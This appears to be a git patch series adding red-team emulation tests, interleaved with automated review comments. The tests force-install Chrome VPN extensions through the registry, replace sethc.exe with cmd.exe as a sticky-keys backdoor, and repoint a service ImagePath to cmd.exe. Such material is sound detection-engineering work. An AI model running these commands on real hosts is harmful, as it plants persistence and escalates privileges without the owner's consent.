From 164da2cfa0e94a5b47ea2500281f83f55eb63ef1 Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Fri, 27 Nov 2020 14:55:37 -0600
Subject: [PATCH 1/4] T1133 (#1295)
Co-authored-by: Toua Lor
---
atomics/T1133/T1133.yaml | 47 +++++++++
atomics/T1133/src/list of vpn extension.txt | 110 ++++++++++++++++++++
2 files changed, 157 insertions(+)
create mode 100644 atomics/T1133/T1133.yaml
create mode 100644 atomics/T1133/src/list of vpn extension.txt
diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml
new file mode 100644
index 00000000..aa5b5012
--- /dev/null
+++ b/atomics/T1133/T1133.yaml
@@ -0,0 +1,47 @@
+---
+attack_technique: T1133
+display_name: External Remote Services
+
+atomic_tests:
+- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
+ description: |
+ Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ chrome_url:
+ description: chrome installer download URL
+ type: url
+ default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe
+ extension_id:
+ description: chrome extension id
+ type: String
+ default: |
+ "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
+
+ dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
+ dependencies: # (optional)
+ - description: |
+ chrome must be installed
+ prereq_command: 'if (cmd /c "chrome 2>nul") {exit 0} else {exit 1}'
+ get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
+ Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
+ Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
+
+ executor:
+ name: powershell
+ elevation_required: true
+ command: | # these are the actaul attack commands, at least one command must be provided
+ $extList = #{extension_id}
+ foreach ($extension in $extList) {
+ New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
+ New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
+ Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
+ Start-Sleep -Seconds 30
+ Stop-Process -Name "chrome"
+ cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
+ $extList = #{extension_id}
+ foreach ($extension in $extList) {
+ Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}
\ No newline at end of file
diff --git a/atomics/T1133/src/list of vpn extension.txt b/atomics/T1133/src/list of vpn extension.txt
new file mode 100644
index 00000000..64c34497
--- /dev/null
+++ b/atomics/T1133/src/list of vpn extension.txt
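Review bot: The prerequisite check and the executor disagree on where Chrome is: `prereq_command` probes `cmd /c "chrome 2>nul"` (a PATH lookup whose output is what the `if` tests) while the executor hard-codes `C:\Program Files (x86)\Google\Chrome\Application\chrome.exe`, so the prereq can pass on a host where the later `Start-Process` fails, or fail where that fixed path exists. Checking the same path the executor uses keeps the two consistent: `prereq_command: 'if (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe") {exit 0} else {exit 1}'`. The test also lacks the `auto_generated_guid` that the other new tests in this series (T1546.008, T1574.011) carry, and `Stop-Process -Name "chrome"` terminates every Chrome process on the host rather than only the instance the test launched, which the description should state so operators running it on a shared machine expect it. The template comments (`# these are the actaul attack commands ...`, `# (optional) ...`) read as leftover scaffolding and can be dropped, or at least `actaul` corrected to `actual`.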
@@ -0,0 +1,110 @@
+ZenMate VPN - fdcgdnkidjaadafnichfpabhfomcebme
+1clickVPN - fcfhplploccackoneaefokcmbjfbkenj
+Touch VPN - bihmplhobchoageeokmgbdihknkjbknd
+Hola Free VPN - gkojfkhlekighikafcpjkiklfbnlmeio
+Astar VPN - jajilbjjinjmgcibalaakngmkilboobh
+VPN Free - gjknjjomckknofjidppipffbpoekiipm
+Earth VPN - nabbmpekekjknlbkgpodfndbodhijjem
+DotVPN - kpiecbcckbofpmkkkdibbllpinceiihk
+Hotspot Shield Free VPN - nlbejmccbhkncgokjcmghpfloaajcffj
+Browsec VPN - omghfjlpggmjjaagoclmmobgdodcjboh
+VPN-free.pro - bibjcjfmgapbfoljiojpipaooddpkpai
+VPN Unlimited Free - mpcaainmfjjigeicjnlkdfajbioopjko
+PP VPN - jljopmgdobloagejpohpldgkiellmfnc
+IP Unblock - lochiccbgeohimldjooaakjllnafhaid
+Surf VPN - nhnfcgpcbfclhfafjlooihdfghaeinfc
+iNinja VPN - ookhnhpkphagefgdiemllfajmkdkcaim
+Daily VPN - namfblliamklmeodpcelkokjbffgmeoo
+Hoxx VPN Proxy - nbcojefnccbanplpoffopkoepjmhgdgh
+Free VPN - majdfhpaihoncoakbjgbdhglocklcgno
+VPN PROXY MASTER - lnfdmdhmfbimhhpaeocncdlhiodoblbd
+Urban Free VPN - eppiocemhmnlbhjplcgkofciiegomcon
+SaferVPN Proxy - cocfojppfigjeefejbpfmedgjbpchcng
+VPN Professional - foiopecknacmiihiocgdjgbjokkpkohc
+AdGuard VPN - hhdobjgopfphlmjbmnpglhfcgppchgje
+Free VPN - jgbaghohigdbgbolncodkdlpenhcmcge
+Free One Touch VPN - inligpkjkhbpifecbdjhmdpcfhnlelja
+Unlimited VPN & Proxy by ibVPN - higioemojdadgdbhbbbkfbebbdlfjbip
+RusVPN - hipncndjamdcmphkgngojegjblibadbe
+Azino VPN - iolonopooapdagdemdoaihahlfkncfgg
+Pron VPN - nhfjkakglbnnpkpldhjmpmmfefifedcj
+Free Residential VPN - jpgljfpmoofbmlieejglhonfofmahini
+ExpressVPN - fgddmllnllkalaagkghckoinaemmogpe
+Hotspot Shield Elite VPN Proxy - ejkaocphofnobjdedneohbbiilggdlbi
+Hide My IP VPN - keodbianoliadkoelloecbhllnpiocoi
+Tunnello VPN - hoapmlpnmpaehilehggglehfdlnoegck
+HMA VPN Proxy Unblocker - poeojclicodamonabcabmapamjkkmnnk
+Free Avira Phantom VPN - dfkdflfgjdajbhocmfjolpjbebdkcjog
+Hola VPN - kcdahmgmaagjhocpipbodaokikjkampi
+Free VPN for Chrome - klnkiajpmpkkkgpgbogmcgfjhdoljacg
+Hub VPN - 
lneaocagcijjdpkcabeanfpdbmapcjjg
+Free Proxy VPN - pgfpignfckbloagkfnamnolkeaecfgfh
+Private Internet Access - jplnlifepflhkbkgonidnobkakhmpnmh
+Turbo VPN for PC - jliodmnojccaloajphkingdnpljdhdok
+Windscribe - hnmpcagpplmpfojmgmnngilcnanddlhb
+CyberGhost VPN - ffbkglfijbcbgblgflchnbphjdllaogb
+VPN.AC - kcndmbbelllkmioekdagahekgimemejo
+Browser VPN - jdgilggpfmjpbodmhndmhojklgfdlhob
+DEEPRISM VPN - bihhflimonbpcfagfadcnbbdngpopnjb
+My Browser Vpn - ppajinakbfocjfnijggfndbdmjggcmde
+SetupVPN - oofgbpoabipfcfjapgnbbjjaenockbdp
+Wachee VPN - bhnhkdgoefpmekcgnccpnhjfdgicfebm
+Thunder Proxy - knmmpciebaoojcpjjoeonlcjacjopcpf
+Free Proxy VPN - dhadilbmmjiooceioladdphemaliiobo
+FastestVPN Proxy - jedieiamjmoflcknjdjhpieklepfglin
+WorkingVPN - mhngpdlhojliikfknhfaglpnddniijfh
+TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa
+BelkaVPN - npgimkapccfidfkfoklhpkgmhgfejhbj
+VPN Master - akeehkgglkmpapdnanoochpfmeghfdln
+Unblock Websites - gbmdmipapolaohpinhblmcnpmmlgfgje
+Lethean Proxy VPN - aigmfoeogfnljhnofglledbhhfegannp
+Whoer VPN - cgojmfochfikphincbhokimmmjenhhgk
+Best VPN USA - ficajfeojakddincjafebjmfiefcmanc
+FREE VPN DEWELOPMENT - ifnaibldjfdmaipaddffmgcmekjhiloa
+apkfold free vpn - jbnmpdkcfkochpanomnkhnafobppmccn
+Soul VPN - apcfdffemoinopelidncddjbhkiblecc
+DotVPN - mjolnodfokkkaichkcjipfgblbfgojpa
+rderzh VPN Proxy - oifjbnnafapeiknapihcmpeodaeblbkn
+Red Panda VPN - plpmggfglncceinmilojdkiijhmajkjh
+Ultrareach VPN - mjnbclmflcpookeapghfhapeffmpodij
+FastStunnel VPN - bblcccknbdbplgmdjnnikffefhdlobhp
+VirtualShield VPN - aojlhgbkmkahabcmcpifbolnoichfeep
+Adblock Office VPN Proxy Server - lcmammnjlbmlbcaniggmlejfjpjagiia
+Guru VPN & Proxy - knajdeaocbpmfghhmijicidfcmdgbdpm
+Malus VPN - bdlcnpceagnkjnjlbbbcepohejbheilk
+Muscle VPN - edknjdjielmpdlnllkdmaghlbpnmjmgb
+Push VPN - eidnihaadmmancegllknfbliaijfmkgo
+Gom VPN - ckiahbcmlmkpfiijecbpflfahoimklke
+Free Fast VPN - macdlemfnignjhclfcfichcdhiomgjjb
+BullVPN - chioafkonnhbpajpengbalkececleldf
+HideAll VPN - 
amnoibeflfphhplmckdbiajkjaoomgnj
+ProxyFlow - llbhddikeonkpbhpncnhialfbpnilcnc
+Cloud VPN - pcienlhnoficegnepejpfiklggkioccm
+sVPN - iocnglnmfkgfedpcemdflhkchokkfeii
+Social VPN - igahhbkcppaollcjeaaoapkijbnphfhb
+Trellonet Trellonet - njpmifchgidinihmijhcfpbdmglecdlb
+WindmillVPN - ggackgngljinccllcmbgnpgpllcjepgc
+IPBurger Proxy & VPN - kchocjcihdgkoplngjemhpplmmloanja
+Veee - bnijmipndnicefcdbhgcjoognndbgkep
+Anonymous Proxy Vpn Browser - lklekjodgannjcccdlbicoamibgbdnmi
+Hideman VPN - dbdbnchagbkhknegmhgikkleoogjcfge
+Fornex VPN - egblhcjfjmbjajhjhpmnlekffgaemgfh
+WeVPN - ehbhfpfdkmhcpaehaooegfdflljcnfec
+VPNMatic - bkkgdjpomdnfemhhkalfkogckjdkcjkg
+Urban Shield - almalgbpmcfpdaopimbdchdliminoign
+Prime VPN - akkbkhnikoeojlhiiomohpdnkhbkhieh
+westwind - gbfgfbopcfokdpkdigfmoeaajfmpkbnh
+Upnet - bniikohfmajhdcffljgfeiklcbgffppl
+uVPN - lejgfmmlngaigdmmikblappdafcmkndb
+Nucleus VPN - ffhhkmlgedgcliajaedapkdfigdobcif
+Touch VPN - bihmplhobchoageeokmgbdihknkjbknd
+FoxyProxy Standard - gcknhkkoolaabfmlnjonogaaifnjlfnp
+GeoProxy - pooljnboifbodgifngpppfklhifechoe
+NordVPN - fjoaledfpmneenckfbpdfhkmimnjocfa
+ProxFlow - aakchaleigkohafkfjfjbblobjifikek
+Proxy SwitchySharp - dpplabbmogkhghncfbfdeeokoefdjegm
+Proxy SwitchyOmega - padekgcemlokbadohgkifijomclgjgif
+PureVPN - bfidboloedlamgdmenmlbipfnccokknp
+RusVPN - hipncndjamdcmphkgngojegjblibadbe
+SaferVPN - cocfojppfigjeefejbpfmedgjbpchcng
+TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa
\ No newline at end of file
From 9ec5d7dd9afbd875a706d1339cd631c4bbff8991 Mon Sep 17 00:00:00 2001
From: Brian Thacker
Date: Fri, 27 Nov 2020 14:57:42 -0600
Subject: [PATCH 2/4] Update T1218 Test 5 (#1296)
default path contains a space and the command needs to be surrounded by quotes.
Co-authored-by: Carrie Roberts
---
atomics/T1218/T1218.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index 0b10961a..1c1e297d 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -122,4 +122,4 @@ atomic_tests:
name: command_prompt
elevation_required: false
command: |
- #{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"
+ "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
From 91ea164b8e4d34bf0e0f7b1967993c7fdd5bc28a Mon Sep 17 00:00:00 2001
From: P4T12ICK
Date: Fri, 27 Nov 2020 22:13:05 +0100
Subject: [PATCH 3/4] new atomic (#1298)
Co-authored-by: P4T12ICK
Co-authored-by: Carrie Roberts
---
atomics/T1546.008/T1546.008.yaml | 19 +++++++++++++++++--
1 file changed, 17 insertions(+), 2 deletions(-)
diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
index 4ddefabb..fda9c6b0 100644
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -25,7 +25,7 @@ atomic_tests:
$input_table = "#{parent_list}".split(",")
$Name = "Debugger"
$Value = "#{attached_process}"
- Foreach ($item in $input_table){
+ Foreach ($item in $input_table){
$item = $item.trim()
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
IF(!(Test-Path $registryPath))
@@ -47,4 +47,19 @@ atomic_tests:
}
name: powershell
elevation_required: true
-
+- name: Replace binary of sticky keys
+ auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
+ description: |
+ Replace sticky keys binary (sethc.exe) with cmd.exe
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+ takeown /F C:\Windows\System32\sethc.exe /A
+ icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
+ copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
+ cleanup_command: |
+ copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
+ name: command_prompt
+ elevation_required: true
From d5e64a6d879e09d08bc10b679cf4305a2451810d Mon Sep 17 00:00:00 2001
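Review bot: The `cleanup_command` of the new sticky keys test only copies `sethc_backup.exe` back over `sethc.exe`; the backup file is left behind in System32 and the `takeown` / `icacls ... /grant Administrators:F` changes are never reverted, so after cleanup the host still has a changed owner and an extra full-control ACE on a protected binary — exactly the weakened state a detection engineer running this test would want removed. At minimum add `del /F C:\Windows\System32\sethc_backup.exe` after the restore in `cleanup_command`; reverting the owner and DACL needs them captured before `takeown` runs (icacls has `/save` and `/restore` for the DACL, but I have not verified that they cover ownership here, so treat that part as something to test). The attack lines also run unconditionally in `command_prompt`, so if the first `copy` fails there is no backup yet `sethc.exe` is still overwritten; guarding it with `copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe || exit /b 1` avoids that.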
From: P4T12ICK
Date: Fri, 27 Nov 2020 22:15:29 +0100
Subject: [PATCH 4/4] New atomic t1574 011 (#1301)
* new atomic
* new atomic
* new atomic
* new atomic
Co-authored-by: P4T12ICK
Co-authored-by: Carrie Roberts
---
atomics/T1574.011/T1574.011.yaml | 37 ++++++++++++++++++++++++++++++--
1 file changed, 35 insertions(+), 2 deletions(-)
diff --git a/atomics/T1574.011/T1574.011.yaml b/atomics/T1574.011/T1574.011.yaml
index 1699ec27..2d13e804 100644
--- a/atomics/T1574.011/T1574.011.yaml
+++ b/atomics/T1574.011/T1574.011.yaml
@@ -4,7 +4,7 @@ atomic_tests:
- name: Service Registry Permissions Weakness
auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
description: |
- Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
+ Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
supported_platforms:
- windows
@@ -17,4 +17,37 @@ atomic_tests:
command: |
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
- name: powershell
\ No newline at end of file
+ name: powershell
+- name: Service ImagePath Change with reg.exe
+ auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
+ description: |
+ Change Service registry ImagePath of a bengin service to a malicious file
+ supported_platforms:
+ - windows
+ input_arguments:
+ weak_service_name:
+ description: weak service name
+ type: String
+ default: calcservice
+ weak_service_path:
+ description: weak service path
+ type: String
+ default: '%windir%\system32\win32calc.exe'
+ malicious_service_path:
+ description: malicious service path
+ type: String
+ default: '%windir%\system32\cmd.exe'
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ The service must exist (#{weak_service_name})
+ prereq_command: |
+ if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
+ executor:
+ command: |
+ reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}"
+ cleanup_command: |
+ sc.exe delete #{weak_service_name}
+ name: command_prompt
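Review bot: The cleanup deletes the service (`sc.exe delete #{weak_service_name}`) rather than undoing the change the executor made, so when `weak_service_name` names a service that already existed — the prereq passes in that case without ever running `sc.exe create` — cleanup removes a real service instead of restoring its ImagePath. Restoring the overwritten value is the safer first step, `reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{weak_service_path}"`, with the `sc.exe delete` kept only for the case where the test's own `get_prereq_command` created the service; since the schema cannot record that, the description should at least say the default `calcservice` is expected to be test-created. Note also that `get_prereq_command` runs under `dependency_executor_name: powershell`, where `%windir%` in the default `weak_service_path` is not expanded, so the created service's binary path is stored literally, while the `command_prompt` executor expands the same variable before `reg.exe add` writes it; whether the SCM expands the literal form at start time I have not verified, so the two defaults are worth checking together. The description typo `bengin` should read `benign`.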